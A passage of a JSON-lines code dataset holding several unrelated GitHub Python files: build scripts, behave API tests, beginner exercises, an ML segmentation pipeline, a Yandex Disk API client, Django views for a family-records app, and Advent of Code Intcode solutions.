.set_destination(path)))\n else:\n project.depend(github.Source(author, git_path, branch, super_repository=tl_repo)\n .set_destination(path))\n\n\n\ndef python_zip_collect(context):\n import libpatterns\n import glob\n from zipfile import ZipFile\n\n ip = os.path.join(config[\"paths\"][\"install\"], \"bin\")\n bp = python.python['build_path']\n\n with ZipFile(os.path.join(ip, \"python27.zip\"), \"w\") as pyzip:\n for pattern in libpatterns.patterns:\n for f in glob.iglob(os.path.join(bp, pattern)):\n pyzip.write(f, f[len(bp):])\n\n return True\n\n\nProject(\"python_zip\") \\\n .depend(build.Execute(python_zip_collect)\n .depend(\"Python\")\n )\n\nif config['Installer']:\n #build_installer = cmake.CMake().arguments(cmake_parameters +[\"-DCMAKE_INSTALL_PREFIX:PATH={}/installer\".format(config[\"__build_base_path\"])]).install()\n wixinstaller = Project(\"WixInstaller\")\n\n wixinstaller.depend(github.Source(config['Main_Author'],\"modorganizer-WixInstaller\", \"VSDev\", super_repository=tl_repo)\n .set_destination(\"WixInstaller\"))\\\n .depend(\"modorganizer\").depend(\"usvfs\").depend(\"usvfs_32\")\n\n\n","repo_name":"TanninOne/modorganizer-umbrella","sub_path":"makefile.uni.py","file_name":"makefile.uni.py","file_ext":"py","file_size_in_byte":12381,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"51"} +{"seq_id":"41415841141","text":"from behave import (\n use_step_matcher,\n when,\n step,\n)\nfrom rest_framework.reverse import reverse\n\nfrom core.models import Tag\nfrom recipe.serializers import TagSerializer\n\nuse_step_matcher(\"cfparse\")\n\n\nTAGS_URL = reverse(\"recipe:tag-list\")\n\n\n@when(\"I call the tag list API\")\ndef step_impl(context):\n \"\"\"\n :type context: behave.runner.Context\n \"\"\"\n context.url_response = context.test_client.get(TAGS_URL)\n\n\n@step(\"All of my tags are in the response ordered by name\")\ndef step_impl(context):\n \"\"\"\n :type context: behave.runner.Context\n \"\"\"\n tags = Tag.objects.all().order_by(\"-name\")\n serializer = TagSerializer(tags, many=True)\n context.test_case.assertEquals(context.url_response.data, serializer.data)\n\n\n@step('The response contains \"1\" key')\ndef step_impl(context):\n \"\"\"\n :type context: behave.runner.Context\n \"\"\"\n data = context.url_response.data\n context.test_case.assertEquals(len(data), 1)\n\n\n@step('the tag \"{tagname}\" is returned in the response')\ndef step_impl(context, tagname):\n \"\"\"\n :type context: behave.runner.Context\n \"\"\"\n data = context.url_response.data\n context.test_case.assertEquals(data[0][\"name\"], tagname)\n\n\n@when(\"I call the tag API with the following payload:\")\n@when(\"I call the tag API with the following payload\")\ndef step_impl(context):\n \"\"\"\n :type context: behave.runner.Context\n \"\"\"\n tag_name = context.table.rows[0][0]\n payload = {\n \"name\": tag_name\n }\n\n context.url_response = context.test_client.post(TAGS_URL, payload)\n\n\n@when(\"I call the tag API with an empty name\")\ndef step_impl(context):\n \"\"\"\n :type context: behave.runner.Context\n \"\"\"\n payload = {\n \"name\": \"\",\n }\n\n context.url_response = context.test_client.post(TAGS_URL, payload)\n","repo_name":"Zemeio/pythontddcourse","sub_path":"app/features/steps/tags_api.py","file_name":"tags_api.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42053026819","text":"def three_seq_one(number):\n while number != 1:\n print(number, end=\", \")\n if number % 2 == 0:\n number = number // 2\n else:\n number = number * 3 + 1\n print(number, end=\".\\n\")\n\n\nthree_seq_one(3)\n\nfor i in range(10):\n print(i, \"\\t\", 2 ** i)\n\nfor i in range(1, 7):\n print(i + 2, end=\" \")\n\nfor i in [12, 4, 5, 9, 23]:\n if i % 2 == 1:\n continue\n print(i)\n\nnum = int(input(\"enter number: \"))\nwhile True:\n three_seq_one(num)\n response = input(\"Do you want to perform another task? \").lower()\n if response != \"yes\":\n break\n else:\n raise ValueError(\"Wrong Input\")\n\nceleb = [(\"michael\", 1995), (\"mercy\", 1995), (\"Elizabeth\", 1999)]\n\nfor (name, year) in celeb:\n print(name, end=\", \")\n print(year, end=\".\\n\")\n\nstudents = [('amaka', ['com sci', 'economics']),\n ('shile', ['Software Eng', 'design']),\n ('nne', ['com sci', 'data science']),\n ('toheeb', ['com sci', 'economics', 'english']),\n ('chinedu', ['com sci', 'economics', 'mathematics'])]\nfor name, course in students:\n print(name, \"takes\", len(course), \"course\", end=\".\\n\")\n\nfor name, course in students:\n print(list(enumerate(name)))\n print(name)\n\n","repo_name":"akenz1901/Kata-journey-two","sub_path":"chapter_three/working_with_end_operator.py","file_name":"working_with_end_operator.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"30820991002","text":"import os\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom tqdm import tqdm\nfrom skimage.transform import resize\n\nfrom .utils import load_json, dump_json, load_pred, get_pred, get_spatial, rl_enc, load\nfrom .torch_models.torch_utils import to_np, to_var, logits2pred\nfrom .torch_models.model import fit_model\nfrom .dataset import Dataset, DatasetTest\n\n\ndef generate_experiment(exp_path, cv_splits, dataset, split_type='tvt', task_type='segm'):\n \"\"\"Generates experiment with given parameters. Main information saves in config.\n\n Parameters\n ----------\n exp_path: str\n Path where to generate experiment and save config.\n\n cv_splits: list\n List of dict(s), which describes cross-val splitting of experiment.\n\n dataset: class\n Dataset like object.\n\n split_type: str, optional\n Type of split: train-val-test (`tvt`) or train-val (`tv`).\n\n task_type: str, optional\n Type of task: segmentation (`segm`) or other (`other`), for example regression.\n \"\"\"\n if not os.path.exists(exp_path):\n os.makedirs(exp_path)\n else:\n assert False, f'Experiment `{exp_path}` already exists.'\n\n assert split_type in ('tvt', 'tv'), \\\n f'experiment type should be `tvt` or `tv`, {split_type} given'\n\n assert task_type in ('segm', 'other'), \\\n f'experiment type should be `segm` or `other`, {task_type} given'\n\n config = {'data_path': dataset.data_path,\n 'modalities': dataset.modalities,\n 'features': dataset.features,\n 'target': dataset.target,\n 'n_splits': len(cv_splits),\n 'split_type': split_type,\n 'task_type': task_type}\n dump_json(config, os.path.join(exp_path, 'config.json'))\n\n for i, split in enumerate(cv_splits):\n val_path = os.path.join(exp_path, f'experiment_{i}')\n os.mkdir(val_path)\n\n dump_json(list(np.array(split['train_ids'], dtype='str')), os.path.join(val_path, 'train_ids.json'))\n dump_json(list(np.array(split['val_ids'], dtype='str')), os.path.join(val_path, 'val_ids.json'))\n\n if split_type == 'tvt':\n dump_json(list(np.array(split['test_ids'], dtype='str')), os.path.join(val_path, 'test_ids.json'))\n elif split_type == 'tv':\n pass\n\n\ndef load_val_data(exp_path, n_val):\n \"\"\"Loads stacks of images to validate model on.\n\n Parameters\n ----------\n exp_path: str\n Path where to load experiment info from.\n\n n_val: int\n The id of validation (depends on number of generated experiments).\n\n Returns\n -------\n x_val, y_val: np.ndarray\n \"\"\"\n config_path = os.path.join(exp_path, 'config.json')\n\n config = load_json(config_path)\n ds = Dataset(data_path=config['data_path'], modalities=config['modalities'],\n features=config['features'], target=config['target'])\n\n val_path = os.path.join(exp_path, f'experiment_{n_val}')\n\n val_ids = np.array(load_json(os.path.join(val_path, 'val_ids.json')), dtype='int64')\n\n x_val, y_val = [], []\n for _id in val_ids:\n x_val.append(ds.load_x(_id))\n y_val.append(ds.load_y(_id))\n x_val = np.array(x_val, dtype='float32')\n y_val = np.array(y_val, dtype='float32')\n\n return x_val, y_val\n\n\ndef calculate_metrics(exp_path, n_val, metrics_dict):\n \"\"\"Calculates and saves test metric values in `test_metrics` folder.\n\n Parameters\n ----------\n exp_path: str\n Path to the experiment.\n\n n_val: int\n The id of cross-val to calculates metrics in.\n\n metrics_dict: dict\n dict containing metrics names which map into (`function`, `apply_scaling`).\n `apply_scaling` is `bool` value indicates apply or not the scaling on prediction.\n \"\"\"\n config_path = os.path.join(exp_path, 'config.json')\n config = load_json(config_path)\n\n assert config['split_type'] == 'tvt', \\\n f'There is no test items to calculate metrics'\n\n ds = Dataset(data_path=config['data_path'], modalities=config['modalities'],\n features=config['features'], target=config['target'])\n\n val_path = os.path.join(exp_path, f'experiment_{n_val}')\n pred_path = os.path.join(val_path, 'test_predictions')\n\n metric_path = os.path.join(val_path, 'test_metrics')\n if not os.path.exists(metric_path):\n os.makedirs(metric_path)\n\n test_ids_str = load_json(os.path.join(val_path, 'test_ids.json'))\n test_ids = np.array(test_ids_str, dtype='int64')\n\n if config['task_type'] == 'segm':\n pred_fn = get_pred\n else: # == 'other'\n pred_fn = get_spatial\n\n for metric_name in metrics_dict.keys():\n metric_fn = metrics_dict[metric_name]\n\n results = {}\n for _id, _id_str in zip(test_ids, test_ids_str):\n pred = pred_fn(load_pred(_id, pred_path))\n mask = pred_fn(ds.load_y(_id))\n\n result = metric_fn(mask, pred)\n results[_id_str] = result\n # end for\n\n metric_filename = os.path.join(metric_path, metric_name + '.json')\n assert not os.path.exists(metric_filename), \\\n f'metric {metric_name} has already been calculated'\n dump_json(results, metric_filename)\n # end for\n\n\ndef get_experiment_result(exp_path, n_splits, metric_name):\n val_results = []\n\n for i in range(n_splits):\n metric_path = os.path.join(exp_path, f'experiment_{i}/test_metrics/{metric_name}.json')\n results_dict = load_json(metric_path)\n\n val_mean = np.mean(list(results_dict.values()))\n val_results.append(val_mean)\n # end for\n\n return np.mean(val_results)\n\n\ndef make_predictions(exp_path, n_val):\n \"\"\"Makes test predictions and saves them in `test_predictions` folder.\n\n Parameters\n ----------\n exp_path: str\n Path to the experiment.\n\n n_val: int\n The id of cross-val to make predictions in.\n \"\"\"\n config_path = os.path.join(exp_path, 'config.json')\n\n config = load_json(config_path)\n ds = Dataset(data_path=config['data_path'], modalities=config['modalities'],\n features=config['features'], target=config['target'])\n\n val_path = os.path.join(exp_path, f'experiment_{n_val}')\n\n model = torch.load(os.path.join(val_path, 'model.pt'))\n model = model.cuda()\n\n pred_path = os.path.join(val_path, 'test_predictions')\n if not os.path.exists(pred_path):\n os.makedirs(pred_path)\n\n test_ids_str = load_json(os.path.join(val_path, 'test_ids.json'))\n test_ids = np.array(test_ids_str, dtype='int64')\n\n for _id, _id_str in zip(test_ids, test_ids_str):\n x = ds.load_x(_id)\n\n # DO INFERENCE STEP:\n with torch.no_grad():\n model.eval()\n x_t = to_var(np.array([x], dtype='float32'), requires_grad=False)\n y = to_np(logits2pred(model(x_t)))[0]\n\n y_filename = os.path.join(pred_path, _id_str + '.npy')\n\n np.save(y_filename, y)\n\n del x, x_t, y\n # end for\n\n\ndef do_experiment(exp_path, n_val):\n \"\"\"Performs learning, making predictions and calculating metrics processes.\"\"\"\n\n print('>>> loading resources..')\n\n val_path = os.path.join(exp_path, f'experiment_{n_val}')\n resources = load(os.path.join(val_path, 'resources.gz'))\n\n torch_model = resources['torch_model']\n batch_iter = resources['batch_iter']\n epochs = resources['epochs']\n steps_per_epoch = resources['steps_per_epoch']\n saving_model_mode = resources['saving_model_mode']\n metrics_dict = resources['metrics_dict']\n\n val_data = load_val_data(exp_path=exp_path, n_val=n_val)\n\n print('>>> fitting model..')\n\n fit_model(\n torch_model=torch_model, generator=batch_iter.flow(), val_path=val_path, val_data=val_data,\n epochs=epochs, steps_per_epoch=steps_per_epoch, verbose=True,\n saving_model_mode=saving_model_mode\n )\n\n print('>>> making predictions..')\n make_predictions(exp_path=exp_path, n_val=n_val)\n\n print('>>> calculating metrics..')\n calculate_metrics(exp_path=exp_path, n_val=n_val, metrics_dict=metrics_dict)\n\n\ndef test2csv_pred(prep_test_path, csv_filename, model, modalities=['image'], features=None,\n threshold=0.5):\n \"\"\"Converts test images with given `model` into submission-ready csv-file.\n\n Parameters\n ----------\n prep_test_path: str\n Path to stored test data with generated `metadata`.\n\n csv_filename: str\n Filename of csv-file to save. Should have 'some_name.csv' structure.\n\n model: torch.nn.Module, or the same\n Model to do predictions with.\n\n modalities: list, optional\n List of modalities to load as channel(s) of the single image.\n\n features: list, optional\n List of features to load as additional channel(s) of the single image.\n\n threshold: float\n Threshold to make binary prediction. Must be between 0. and 1.\n \"\"\"\n metadata = pd.read_csv(os.path.join(prep_test_path, 'metadata.csv'), index_col=[0])\n test_ids = metadata.index\n test_ids_orig = metadata['id'].values\n\n ds = DatasetTest(prep_test_path, modalities=modalities, features=features)\n\n id_rle_dict = {}\n\n for _id in tqdm(test_ids):\n x = ds.load_x(_id)\n\n # TODO: add not DL method of prediction\n\n # *** DL methods ***\n with torch.no_grad():\n model = model.cuda()\n model.eval()\n\n pred = model(to_var(np.array([x], dtype='float32'), requires_grad=False))\n # TODO: add sequence of models\n pred = to_np(pred)[0]\n\n # TODO: add postprocessing\n\n # converting to 2-dim numpy array (image-like) of original shape (101x101)\n # then to binary predictions\n if len(pred.shape) == 3:\n pred = pred[0]\n\n ORIG_SIZE = 101\n if pred.shape[-1] != ORIG_SIZE:\n pred = resize(pred, output_shape=(ORIG_SIZE, ORIG_SIZE), order=3, preserve_range=True)\n\n pred = pred > threshold\n\n # *** Encoding binarized predictions ***\n rle_pred = rl_enc(pred)\n id_rle_dict[test_ids_orig[_id]] = rle_pred\n\n # end for\n\n # *** Saving submission csv-file ***\n csv_to_save = pd.DataFrame.from_dict(id_rle_dict, orient='index')\n\n csv_to_save.index.names = ['id']\n csv_to_save.columns = ['rle_mask']\n\n csv_to_save.to_csv(os.path.join(prep_test_path, csv_filename))\n","repo_name":"BorisShirokikh/salt-challenge","sub_path":"saltsegm/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":10354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3469635943","text":"import requests\n\nfrom ... import errors\nfrom . import decorators\n\n\nURL = 'https://cloud-api.yandex.net/v1/disk/'\n\n\n_errors_mapping = {\n 400: errors.BadData,\n 403: errors.Forbidden,\n 404: errors.NotFound,\n 409: errors.Conflict,\n}\n\n\n@decorators.ya_request_params\n@decorators.wrap_errors\ndef get(url, params=None, **kwargs):\n response = requests.get(URL + url, params=params, **kwargs)\n _handle_responses(response)\n return response.json()\n\n\n@decorators.ya_request_params\n@decorators.wrap_errors\ndef put(url, params=None, absolute_url=False, **kwargs):\n request_url = url if absolute_url else URL + url\n response = requests.put(request_url, data=params, **kwargs)\n _handle_responses(response)\n return response.json() if response.text != '' else None\n\n\n@decorators.ya_request_params\n@decorators.wrap_errors\ndef post(url, params=None, json=None, **kwargs):\n return requests.post(\n URL + url,\n data=params,\n json=json,\n **kwargs\n )\n\n\n@decorators.ya_request_params\n@decorators.wrap_errors\ndef delete(url, **kwargs):\n return requests.delete(URL + url, **kwargs)\n\n\ndef _handle_responses(response):\n if response.status_code < 300:\n return\n error_text = '{}: {}'.format(\n response.reason,\n response.text,\n )\n if response.status_code >= 500:\n raise errors.InteranalYaDError(error_text)\n if response.status_code in _errors_mapping:\n raise _errors_mapping[response.status_code](error_text)\n","repo_name":"freylis/yadbu","sub_path":"yadbu/api_client/requester/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71606062878","text":"from django.shortcuts import render\nfrom .models import *\nfrom django.contrib.auth.decorators import login_required\n\n\n\n@login_required(login_url='/')\ndef home(request):\n return render(request, 'home.html')\n\n@login_required(login_url='/')\ndef search(request):\n if request.method == 'GET':\n print(\"hasib\")\n search_value = request.GET.get('search')\n print(search_value)\n print(search_value.isnumeric())\n if search_value.isnumeric():\n try:\n search_data = Member.objects.filter(national_id_number__contains = search_value)\n context = {'search_data':search_data}\n return render(request, 'search_data.html', context)\n except:\n context = {'search_data':''}\n return render(request, 'search_data.html', context)\n # print(search_item)\n else:\n try:\n search_data = Member.objects.filter(name__contains = search_value)\n context = {'search_data':search_data}\n return render(request, 'search_data.html', context)\n except:\n context = {'search_data':''}\n return render(request, 'search_data.html', context)\n # return render(req)\n return render(request, 'search_data.html')\n\n@login_required(login_url='/')\ndef profile_details(request, id):\n member = Member.objects.get(id = id)\n if member.father:\n father = Member.objects.get(id = member.father.id)\n else:\n father = None\n if member.mother:\n mother = Member.objects.get(id = member.mother.id)\n else:\n mother = None\n if father and mother:\n sibling = Member.objects.filter(father = father, mother = mother)\n elif father:\n sibling = Member.objects.filter(father = father)\n elif mother:\n sibling = Member.objects.filter(mother = mother)\n else:\n sibling = None\n \n chilrens = member.children_of_father.all()\n print(chilrens)\n wife = member.wives.all()\n print(father)\n print(mother)\n print(wife)\n print(sibling)\n context = {\n 'member':member, \n 'father':father,\n 'mother':mother,\n 'sibling':sibling,\n 'wife':wife,\n 'chilrens':chilrens\n }\n return render(request, 'profile_details.html', context)\n\n\ndef dashboard(request):\n\n return render(request, 'dashboard.html')\n\n@login_required(login_url='/')\ndef blood_doner(request):\n members = Member.objects.filter(\n want_to_donate_blood = True)\n \n b_group = request.GET.get('blood_group')\n if b_group:\n members = members.filter(\n blood_group__name_of_group = b_group)\n \n dist_name = request.GET.get('area')\n if dist_name:\n members = members.filter(\n district__name = dist_name)\n \n blood_groups = BloodGroup.objects.all()\n districts = District.objects.all()\n \n context = {\n 'blood_groups':blood_groups,\n 'districts':districts,\n 'members':members,\n }\n \n return render(request, 'blood_doner.html', context)\n\n # if request.method == 'POST':\n \n # print(\"hasib\")\n # b_group = request.POST['blood_group']\n # dist_name = request.POST['area']\n # context.update({'b_group':b_group, 'dist_name':dist_name})\n # print(b_group)\n # print(dist_name)\n\n # try:\n # b_group = blood_groups.get(name_of_group = b_group)\n # except:\n # b_group = None\n\n # print(b_group)\n \n # try:\n # dist_name = districts.get(name__contains = dist_name)\n # except:\n # dist_name = None\n # print(b_group)\n # print(dist_name)\n\n # if dist_name and b_group:\n # try:\n # members = Member.objects.filter(\n # blood_group__name_of_group = b_group, \n # district__name = dist_name,\n # want_to_donate_blood = True)\n\n # context['members'] = members\n # return render(request, 'blood_doner.html', context)\n # except:\n # context['message'] = \"No Data Found\"\n # return render(request, 'blood_doner.html', context)\n\n # elif dist_name:\n # print(\"dd\")\n # try:\n # members = Member.objects.filter(\n # district__name = dist_name,\n # want_to_donate_blood = True)\n # context['members'] = members\n # return render(request, 'blood_doner.html', context)\n\n # except:\n # context['message'] = \"No Data Found\"\n # return render(request, 'blood_doner.html', context)\n \n \n # elif b_group:\n # print(1)\n # try:\n # members = Member.objects.filter(\n # blood_group__name_of_group = b_group,\n # want_to_donate_blood = True)\n \n # context['members'] = members\n # return render(request, 'blood_doner.html', context)\n \n # except:\n # context['message'] = \"No Data Found\"\n # return render(request, 'blood_doner.html', context)\n # else:\n # context['message'] = \"No Data Found\"\n # return render(request, 'blood_doner.html', context)\n\n # members = Member.objects.filter(want_to_donate_blood = True)\n # context.update({'members':members})\n # return render(request, 'blood_doner.html', context)\n\nimport datetime\n@login_required(login_url='/')\ndef marriagable_list(request):\n compare_date = datetime.datetime.now() - datetime.timedelta(days=25*365)\n member = Member.objects.filter(date_of_birth__lte = compare_date, marital_status = \"S\")\n print(member)\n # for member in member:\n # print(member.gender)\n context = {'member':member}\n return render(request, 'marriagable_list.html', context)\n\n\n@login_required(login_url='/')\ndef important_number(request):\n numbers = ImportantNumber.objects.all()\n context = {'numbers':numbers}\n return render(request, 'important_number.html', context)\n\n\n@login_required(login_url='/')\ndef prayer_place(request, place):\n p_place = PrayerPlace.objects.filter(place_type = place)\n context = {'p_place':p_place, 'place':place}\n return render(request, 'prayer_place.html', context)\n\n\n@login_required(login_url='/')\ndef institution(request,name):\n all_institution = Institution.objects.filter(institute_type = name)\n context = {'all_institution':all_institution, 'name':name}\n return render(request, 'institution.html', context)\n\nfrom familydataapp.forms import*\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.shortcuts import redirect\n\n\ndef user_login(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username = username, password = password)\n if user:\n login(request, user)\n return redirect('/home')\n else:\n msg = \"Invalid Username Or passowrd\"\n context = {'msg':msg}\n return render(request, 'login.html', context)\n # form = UserLoginForm()\n # context = {'form':form}\n return render(request, 'login.html')\n\ndef user_logout(request):\n logout(request)\n return redirect('/')\n\n@login_required(login_url='/')\ndef crime_point(request):\n all_places = CrimePlace.objects.all()\n context = {'all_places':all_places}\n return render(request, 'crime_point.html', context)\n\n@login_required(login_url='/')\ndef crime_team(request, id):\n place = CrimePlace.objects.get(id = id)\n teams = CrimeTeam.objects.filter(crime_location = place)\n # for i in teams:\n # print(i.member.all())\n context = {'teams':teams}\n return render(request, 'crime_team.html', context)\n\n@login_required(login_url='/')\ndef criminals(request):\n all_criminals = Member.objects.filter(is_criminal = True)\n context = {'all_criminals':all_criminals}\n return render(request, 'criminals.html', context)","repo_name":"alhasib/familydataproject","sub_path":"familydataapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43189051481","text":"import inspect\nimport logging\n\nfrom aiohttp import web\n\nfrom app.user.models import User\n\nlogger = logging.getLogger('app')\n\n\nasync def add_user(request: web.Request) -> User:\n async with request.app['db'].acquire() as connection:\n result = await connection.fetch(\n '''\n INSERT INTO public.\"user\" (name)\n VALUES ($1)\n returning *;\n ''',\n request['user'].get('user_name')\n )\n logger.info('Add user () in DB',\n extra={'route': request.path_qs,\n 'functionName': inspect.getframeinfo(inspect.currentframe()).function})\n return User(**result[0])\n\n\nasync def get_user(request: web.Request) -> User:\n async with request.app['db'].acquire() as connection:\n result = await connection.fetch(\n '''\n SELECT * \n FROM public.\"user\"\n WHERE id = $1;\n ''',\n request['user'].get('user_id')\n )\n logger.info('Get user () for DB',\n extra={'route': request.path_qs,\n 'functionName': inspect.getframeinfo(inspect.currentframe()).function})\n\n # request['user'].update({'user_model': User(**result[0])})\n if result:\n return User(**result[0])\n","repo_name":"Mesheryakof/neuron","sub_path":"app/user/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35678821571","text":"import sys\n\n\nlines = (l.strip() for l in sys.stdin)\nx, a, d = 0, 0, 0\n\ndef move(v):\n global x, a, d\n x += v\n d += (a * v)\n\ndef incr_a(v):\n global a\n a += v\n\nfn_map = {\n \"forward\": lambda v: move(int(v)),\n \"down\": lambda v: incr_a(int(v)),\n \"up\": lambda v: incr_a(-int(v)),\n}\nfor l in lines:\n command, v = l.split(\" \")\n fn_map[command](v)\n\nprint(\"{}, {}\".format(x, d))\n","repo_name":"calebwang/adventofcode","sub_path":"day2/solve2.py","file_name":"solve2.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"75131191199","text":"# task1 \n\ndef task1(start_nums,num_steps):\n '''\n Find the spoken number at the step num_steps given the starting numbers\n\n Inputs:\n start_nums (list): a list of integers\n num_steps (int): the maximum step\n \n Returns (int): the last spoken number\n '''\n # Dictionary maps each number to a tuple of the last 2 times it was spoken\n nums = {}\n # Initialize the starting numbers\n for idx, n in enumerate(start_nums):\n nums[n] = (idx + 1, None)\n last_num = start_nums[-1]\n start_turn = len(start_nums) + 1\n\n for turn in range(start_turn, num_steps + 1):\n last1, last2 = nums.get(last_num, (None, None))\n if last2 is None:\n last_num = 0\n else:\n last_num = last1 - last2\n last1, _ = nums.get(last_num, (None, None))\n nums[last_num] = (turn, last1)\n return last_num","repo_name":"kameelkhabaz/uchicago_classes","sub_path":"cmsc12100/short-exercises-kameelkhabaz/practice2020_day15.py","file_name":"practice2020_day15.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30957586555","text":"\"\"\"Advent of Code 2019 Day 7.\"\"\"\n\n\ndef main(file_input='input.txt'):\n intcodes = [\n int(num)\n for num in get_file_contents(file_input)[0].strip().split(',')]\n highest_signal = find_highest_signal(intcodes[:], {0, 1, 2, 3, 4}, signal)\n print(f'Highest signal: {highest_signal}')\n highest_signal_with_feedback = find_highest_signal(\n intcodes[:], {9, 8, 7, 6, 5}, with_feedback_loop)\n print(f'Highest signal with feedback loop: {highest_signal_with_feedback}')\n\n\ndef find_highest_signal(intcodes, phase_set, signal_func):\n \"\"\"Find highest signal from program, using signal_func and phase_set.\"\"\"\n combinations = get_combinations(phase_set, [])\n highest_signal = float('-inf')\n for combination in combinations:\n state = {\n 'input': combination,\n 'output': [0],\n }\n output_signal = signal_func(state, intcodes, combination)\n highest_signal = max(highest_signal, output_signal)\n return highest_signal\n\n\ndef with_feedback_loop(state, intcodes, combination):\n \"\"\"Find signal send from program after using feedback loop.\"\"\"\n programs = []\n for _ in range(5):\n state = get_state(combination.pop(0))\n programs.append((intcodes[:], state))\n programs[0][1]['initial'].append(0)\n connect_amplifers(programs)\n while all('finished' not in program[1] for program in programs):\n for program, state in programs:\n if 'finished' in state:\n continue\n program, state = process_program(program, state)\n return programs[4][1]['output'][0]\n\n\ndef signal(state, intcodes, combination):\n \"\"\"Find signal send from program after processing intcodes on state.\"\"\"\n for initial in combination:\n state = get_state(initial, state['output'][0])\n final_program, state = process_program(intcodes[:], state)\n return state['output'][0]\n\n\ndef connect_amplifers(programs):\n \"\"\"Connect amplifiers by connecting output to the input of next one.\"\"\"\n for program_no, (_, state) in enumerate(programs[1:]):\n state['input'] = programs[program_no][1]['output']\n programs[4][1]['output'] = programs[0][1]['input']\n\n\ndef get_state(initial, input_value=None):\n \"\"\"Get new state, filling initial and optional input_value.\"\"\"\n return {\n 'last_position': None,\n 'initial': [initial],\n 'input': [input_value] if input_value is not None else [],\n 'output': [],\n }\n\n\ndef get_combinations(numbers_left, cur_combination):\n \"\"\"Get combinations from numbers_left.\"\"\"\n if not numbers_left:\n return [cur_combination]\n combinations = []\n for number in numbers_left:\n combinations.extend(get_combinations(\n numbers_left - {number},\n cur_combination + [number]\n ))\n return combinations\n\n\ndef process_program(program, state):\n \"\"\"Process program.\"\"\"\n position = state['last_position'] if state['last_position'] else 0\n while position < len(program):\n state['last_position'] = position\n start = position\n instruction = program[start]\n modes, opcode = parse_instruction(instruction)\n if not opcode:\n break\n parameters, opfunc = get_operation(opcode)\n if opfunc is None:\n state['finished'] = True\n break\n\n end = start + parameters + 1\n func_parameters = program[start + 1:end]\n\n increment, result = opfunc(program, state, func_parameters, modes)\n if increment:\n position += result + 1\n else:\n position = result\n return program, state\n\n\ndef parse_instruction(instruction):\n \"\"\"Parse instruction to modes and opcode.\"\"\"\n opcode = instruction % 100\n result_modes = []\n modes = instruction // 100\n for _ in range(3):\n result_modes.append(modes % 10)\n modes = modes // 10\n return result_modes, opcode\n\n\ndef get_operation(opcode):\n \"\"\"Opcode to operation function mapping.\"\"\"\n opcodes = {\n 1: (3, add_op),\n 2: (3, mult_op),\n 3: (1, input_op),\n 4: (1, output_op),\n 5: (2, jump_if_true),\n 6: (2, jump_if_false),\n 7: (3, less_than),\n 8: (3, equals),\n 99: (0, None),\n }\n return opcodes.get(opcode)\n\n\ndef add_op(program, _, parameters, modes):\n \"\"\"Addition operation.\"\"\"\n *params, target = parameters\n val1, val2 = get_operation_values(program, params, modes)\n program[target] = val1 + val2\n return True, 3\n\n\ndef mult_op(program, _, parameters, modes):\n \"\"\"Multiplication operation.\"\"\"\n *params, target = parameters\n val1, val2 = get_operation_values(program, params, modes)\n program[target] = val1 * val2\n return True, 3\n\n\ndef input_op(program, state, parameters, modes):\n \"\"\"Input operation.\"\"\"\n target = parameters[0]\n if state['initial']:\n program[target] = state['initial'].pop(0)\n else:\n try:\n program[target] = state['input'].pop(0)\n except IndexError:\n return True, 9999\n return True, 1\n\n\ndef output_op(program, state, parameters, modes):\n \"\"\"Output operation.\"\"\"\n value = program[parameters[0]] if modes[0] == 0 else parameters[0]\n state['output'].append(value)\n return True, 1\n\n\ndef jump_if_true(program, _, parameters, modes):\n \"\"\"Jump if true operation.\"\"\"\n val1, val2 = get_operation_values(program, parameters, modes)\n if val1 != 0:\n return False, val2\n return True, 2\n\n\ndef jump_if_false(program, _, parameters, modes):\n \"\"\"Jump if false operation.\"\"\"\n val1, val2 = get_operation_values(program, parameters, modes)\n if val1 == 0:\n return False, val2\n return True, 2\n\n\ndef less_than(program, _, parameters, modes):\n \"\"\"Less than operation.\"\"\"\n *params, target = parameters\n val1, val2 = get_operation_values(program, params, modes)\n if val1 < val2:\n program[target] = 1\n else:\n program[target] = 0\n return True, 3\n\n\ndef equals(program, _, parameters, modes):\n \"\"\"Equal operation.\"\"\"\n *params, target = parameters\n val1, val2 = get_operation_values(program, params, modes)\n if val1 == val2:\n program[target] = 1\n else:\n program[target] = 0\n return True, 3\n\n\ndef get_operation_values(program, parameters, modes):\n \"\"\"Get values from program, based on parameters and modes.\"\"\"\n val1, val2 = [\n program[param] if mode == 0 else param\n for param, mode in zip(parameters, modes)\n ]\n return val1, val2\n\n\ndef get_file_contents(file):\n \"\"\"Read all lines from file.\"\"\"\n with open(file) as f:\n return f.readlines()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gikf/advent-of-code","sub_path":"advent-of-code-2019/day 7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6689,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"39341732819","text":"# -*- coding: utf-8 -*-\n# @Time : 2020-04-05\n# @Author : Virace\n\nfrom cefpython3 import cefpython as cef\n\nimport math\nimport os\nimport sys\n\nimport win32api\nimport win32con\nimport win32gui\n\nDEFAUTL_URL = 'https://api.virace.cc/jgah/cef/'\nDEFAULT_USERNAME = 